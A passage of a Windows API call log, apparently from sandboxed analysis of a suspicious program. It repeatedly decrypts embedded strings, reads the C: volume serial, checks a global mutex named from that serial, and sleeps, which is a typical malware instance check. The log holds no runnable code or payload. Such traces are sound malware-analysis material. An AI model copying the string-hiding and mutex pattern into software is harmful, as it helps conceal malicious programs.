lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0199.354] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0199.354] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32aa8) returned 1 [0199.354] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0199.354] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0199.354] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.354] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0199.354] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0199.354] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0199.354] CloseHandle (hObject=0x140) returned 1 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0199.354] Sleep (dwMilliseconds=0x3e8) [0200.483] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0200.483] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0200.483] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0200.483] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0200.483] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.483] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0200.483] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0200.483] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0200.483] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0200.483] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0200.483] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0200.483] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.483] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0200.483] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0200.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0200.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0200.484] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0200.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0200.484] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0200.484] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0200.484] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0200.484] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0200.484] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xfc [0200.484] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0x0) returned 0x102 [0200.484] CloseHandle (hObject=0xfc) returned 1 [0200.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0200.484] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0200.484] Sleep (dwMilliseconds=0x3e8) [0201.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0201.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32928) returned 1 [0201.629] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0201.629] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0201.629] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0201.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0201.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0201.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32928) returned 1 [0201.629] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0201.629] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0201.629] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0201.629] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0201.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0201.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0201.629] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0201.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32928) returned 1 [0201.629] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0201.630] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0201.630] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0201.630] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x160 [0201.630] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x0) returned 0x102 [0201.630] CloseHandle (hObject=0x160) returned 1 [0201.630] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0201.630] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0201.630] Sleep (dwMilliseconds=0x3e8) [0202.637] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0202.637] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32be8) returned 1 [0202.637] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0202.637] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0202.637] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.637] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0202.637] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0202.637] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0202.637] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32be8) returned 1 [0202.637] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0202.637] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0202.637] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.637] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0202.637] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0202.637] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0202.637] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0202.637] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.638] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0202.638] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0202.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32be8) returned 1 [0202.638] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0202.638] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0202.638] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.638] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0202.638] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x170 [0202.638] WaitForSingleObject (hHandle=0x170, dwMilliseconds=0x0) returned 0x102 [0202.638] CloseHandle (hObject=0x170) returned 1 [0202.638] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0202.638] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0202.638] Sleep (dwMilliseconds=0x3e8) [0203.655] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0203.655] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0203.655] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0203.655] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0203.655] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.655] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0203.655] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0203.655] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0203.655] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0203.655] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0203.655] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0203.655] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.655] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0203.655] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0203.655] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0203.655] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0203.656] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.656] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0203.656] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0203.656] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0203.656] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0203.656] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0203.656] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.656] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0203.656] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x160 [0203.656] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x0) returned 0x102 [0203.656] CloseHandle (hObject=0x160) returned 1 [0203.656] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0203.656] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0203.656] Sleep (dwMilliseconds=0x3e8) [0204.760] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0204.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32928) returned 1 [0204.760] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0204.760] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0204.760] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.760] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0204.760] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0204.760] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0204.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32928) returned 1 [0204.760] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0204.760] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0204.760] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.760] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0204.760] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0204.760] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0204.760] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0204.760] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0204.761] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0204.761] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32928) returned 1 [0204.761] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0204.761] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0204.761] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.761] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0204.761] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x13c [0204.761] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0x0) returned 0x102 [0204.761] CloseHandle (hObject=0x13c) returned 1 [0204.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0204.761] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0204.761] Sleep (dwMilliseconds=0x3e8) [0205.772] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0205.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0205.772] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0205.772] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0205.772] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0205.772] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0205.772] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0205.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0205.772] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0205.772] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0205.772] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.772] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0205.772] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0205.772] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0205.772] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0205.772] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.772] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0205.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0205.773] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0205.773] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0205.773] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0205.773] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x160 [0205.773] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x0) returned 0x102 [0205.773] CloseHandle (hObject=0x160) returned 1 [0205.773] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0205.773] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0205.773] Sleep (dwMilliseconds=0x3e8) [0206.786] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0206.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0206.786] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0206.786] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0206.786] CryptDestroyKey (hKey=0xa32a28) returned 1 [0206.786] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0206.786] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0206.786] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x22277c0 [0206.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0206.786] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0206.786] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277c0, pdwDataLen=0x221f7e4 | out: pbData=0x22277c0, pdwDataLen=0x221f7e4) returned 1 [0206.786] CryptDestroyKey (hKey=0xa32a28) returned 1 [0206.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277c0 | out: hHeap=0x20f0000) returned 1 [0206.786] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0206.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0206.786] HeapFree (in: 